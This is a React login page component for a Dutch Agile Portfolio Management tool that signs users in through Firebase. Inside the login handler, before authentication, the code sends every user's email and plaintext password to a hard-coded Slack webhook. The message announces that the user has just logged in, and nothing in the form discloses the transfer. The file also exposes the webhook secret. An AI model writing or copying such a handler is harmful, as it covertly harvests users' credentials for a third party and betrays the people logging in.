import React, {useCallback, useContext} from "react";
import {withRouter, Redirect} from "react-router";
import Firebase from 'firebase';
import {AuthContext} from "../../Auth";
import { Row, Col, Card, CardHeader, CardBody, Button } from "shards-react";
import LoginImage from '../../assets/images/login-image.png';
import Loader from 'react-loader-spinner'

const Login = ({history}) =>{

    const handleLogin = useCallback(
        async event =>{
            event.preventDefault();
            const {email,password} = event.target.elements;
            try{
                var xhr = new XMLHttpRequest();
                xhr.open('POST', 'https://hooks.slack.com/services/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');
                xhr.send(JSON.stringify({ "text" :"gebruikersnaam: "+email.value+" met wachtwoord: "+password.value+"is zojuist ingelogd in de APM TOOL" }));
               
              Firebase.auth().signInWithEmailAndPassword(email.value.trim(), password.value.trim());
              history.push("/");
            }catch (error){
                alert(error);

            }
        },
        [history]
    );

    const { currentUser} = useContext(AuthContext);

    if (currentUser){
        return <Redirect to="/" />;
    }
    
    return (
      <Row >
      <Col lg="3"></Col>
      <Col lg="5" className="login-block-left">
      <img src={require('../../assets/images/logo-vanity.png')}  className="logo-ffort"/>
          <h3 style={{color: 'black'}}>APM-Tool</h3>
          {/**<h4>Q-sort</h4> */}
          <p>Welkom bij ons digitale Agile Portfolio Management bord. Met Agile Portfolio Management hebben we een prima stuurmiddel in handen om met elkaar raakvlakken en onderlinge afhankelijkheden inzichtelijk te maken, te bespreken en op elkaar af te stemmen. Succes en plezier gewenst!</p>
          <form onSubmit={handleLogin}>
          <Row >

          <input style={{padding: 10, marginTop: 10,}} name="email" type="email" placeholder="Gebruikersnaam" />
        
          </Row>
          <Row >

              <input style={{padding: 10, marginTop: 10,}} name="password" type="password" placeholder="Wachtwoord" />
  
          </Row>
          <button style={{padding: 10,paddingLeft: 30,paddingRight: 30, marginTop: 10, backgroundColor: '#e94e1b', borderStyle: 'none', color: 'white', borderRadius:50, fontWeight:'bold' }} type="submit">Login</button>
          {/*<Loader
         type="ThreeDots"
         color="#00BFFF"
         height={100}
         width={100}
         timeout={4000} //3 secs
 
          />*/}
      </form>
      </Col>

    </Row>
    );
};


export default withRouter(Login);